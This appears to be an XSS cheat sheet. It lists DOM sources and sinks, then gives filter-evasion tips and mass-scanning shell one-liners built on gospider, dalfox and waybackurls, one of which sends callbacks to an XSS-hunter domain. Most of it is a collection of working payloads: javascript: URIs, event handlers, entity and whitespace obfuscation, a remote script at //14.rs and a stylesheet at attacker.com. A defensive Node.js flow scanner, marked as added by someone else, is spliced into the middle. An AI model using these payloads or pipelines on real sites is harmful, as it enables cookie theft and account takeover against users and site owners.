- Credits
- Somdev Sangwan for the awesome tips and tricks.
- domxsswiki for the awesome list of sinks and sources.
- Sources
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage
- Sinks
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location
- Q: How to identify sinks and sources?
- A: Use the browser extension Untrusted Types by filedescriptor.
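A complement to the browser-extension approach, added here as an example and not taken from the page's authors: a small Node.js script that scans page JavaScript for the sources and sinks listed above, following simple assignments so that a source flowing through a variable into a sink is still reported. The function name findDomXssFlows and the sample script are constructed for this example.

```javascript
// Added example, not part of the original page: a line-level scanner pairing the
// sources and sinks above and following simple assignments; a triage aid only.
const SOURCES = [
  /\bdocument\.(?:URL|documentURI|baseURI|cookie|referrer)\b/,
  /\blocation\.(?:href|search|hash|pathname)\b/,
  /\bwindow\.name\b/, /\b(?:localStorage|sessionStorage)\b/,
];
const SINKS = [
  { name: 'eval', re: /\beval\s*\(/ }, { name: 'Function', re: /\bFunction\s*\(/ },
  { name: 'setTimeout', re: /\bset(?:Timeout|Interval|Immediate)\s*\(/ },
  { name: 'document.write', re: /\bdocument\.writeln?\s*\(/ },
  { name: 'innerHTML', re: /\.innerHTML\s*=(?!=)/ },
  { name: 'createContextualFragment', re: /\.createContextualFragment\s*\(/ },
  { name: 'location', re: /\blocation(?:\.href)?\s*=(?!=)/ },
];
// Sources are only searched right of "=", so "location.href = x" is a sink write.
function rhsOf(stmt) {
  const i = stmt.search(/(?<![=!<>])=(?!=)/);
  return i === -1 ? stmt : stmt.slice(i + 1);
}
// Returns [{ line, sink, via }] for each line where tainted data reaches a sink.
function findDomXssFlows(code) {
  const tainted = new Set(), findings = [];
  code.split('\n').forEach((raw, idx) => {
    const stmt = raw.trim(), rhs = rhsOf(stmt);
    const hits = SOURCES.map((re) => (rhs.match(re) || [])[0]).filter(Boolean);
    for (const v of tainted) {
      if (new RegExp('\\b' + v.replace(/\$/g, '\\$') + '\\b').test(rhs)) hits.push(v);
    }
    if (hits.length === 0) return;
    // A plain assignment target now carries tainted data for later lines.
    const decl = stmt.match(/^(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)/);
    if (decl) tainted.add(decl[1]);
    for (const s of SINKS) {
      if (s.re.test(stmt)) findings.push({ line: idx + 1, sink: s.name, via: hits[0] });
    }
  });
  return findings;
}
// Constructed sample script: lines 3, 5 and 6 should be reported, the rest not.
const SAMPLE = [
  'var name = location.hash.slice(1);',
  'var greeting = "Hello " + name;',
  'document.getElementById("out").innerHTML = greeting;',
  'document.getElementById("out").textContent = greeting;',
  'setTimeout("track(" + location.search + ")", 10);',
  'eval(localStorage.getItem("cfg"));',
  'location.href = "/home";',
].join('\n');
console.log(findDomXssFlows(SAMPLE));
```

The textContent line is deliberately not reported: the same tainted value is written through a non-HTML API, which is the usual fix for the innerHTML case.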
Tips and Tricks @s0md3v
- http(s):// can be shortened to // or /\ or \.
- document.cookie can be shortened to cookie. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert()
- You can use // to close a tag instead of >.
- I have found that confirm is the least detected pop-up function so stop using alert.
- Quotes around an attribute value aren't necessary as long as it doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">
- The shortest HTML context XSS payload is <script src=//14.rs> (19 chars)
- Scanning XSS from host / from @cihanmehmet
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt
- Automating XSS using Dalfox, Gf and Waybackurls / from @theinfosecguy
cat test.txt | gf xss | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain (e.g. yours.xss.ht)
- XSS without Gf / from @HacktifyS
waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && printf '\033[0;31m%s Vulnerable\033[0m\n' "$host"; done
- The list-style-image property
<style> li {list-style-image: url("javascript:confirm(1)");} </style>
- Low source
<img lowsrc="javascript:confirm(1)">
- Using the transition event
<style>:target {color: red;}</style>
<div id=x style="transition: color 1s" ontransitionstart=confirm(1)></div>
- HTML entities
<img src=javascript:confirm(&quot;xss&quot;) />
- Grave accent obfuscation
<img src=`javascript:confirm(1)`>
- Malformed anchor tag
\<a onmouseover="confirm(document.cookie)"\>click\</a\>
- Malformed IMG tags
<img """><script>confirm(1)</script>"\>
- Using the fromCharCode() method
<img src=javascript:confirm(String.fromCharCode(88,83,83))>
- Exploiting the bgsound tag
<bgsound src="javascript:confirm(1);">
- Remote style sheet
<link rel="stylesheet" href="http://attacker.com/xss.css" />
- Inside the meta tag content
<meta http-equiv="refresh" content="0;url=javascript:confirm(1);">
- iFrame source
<iframe src="javascript:confirm(1);"></iframe>
- Style attribute
<div style="background-image: url(javascript:confirm(1))"></div>
- Embedded newline
<img src="jav&#x0A;ascript:confirm(1)" />
- Embedded tab
<img src="jav&#x09;ascript:confirm(1)" />
- Default source attribute
<img src=# onmouseover="confirm(1)" />
<img src= onmouseover="confirm(1)" />
- On error alert
<img src=/ onerror="confirm(1)" />
- Decimal HTML character references
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
- Body tag
<body onload=confirm(1)>
- Image dynsrc attribute
<img dynsrc="javascript:confirm(1)">
- Input of type image
<input type="image" src="javascript:confirm(1)">
- Half open HTML/Javascript
<img src="`<javascript:confirm`>(1)"
- Extraneous open brackets
<<script> confirm(1) //\<</script>
- Blogs
- XSS test beds and challenges
- Amazing tools
- XSS weaponized payloads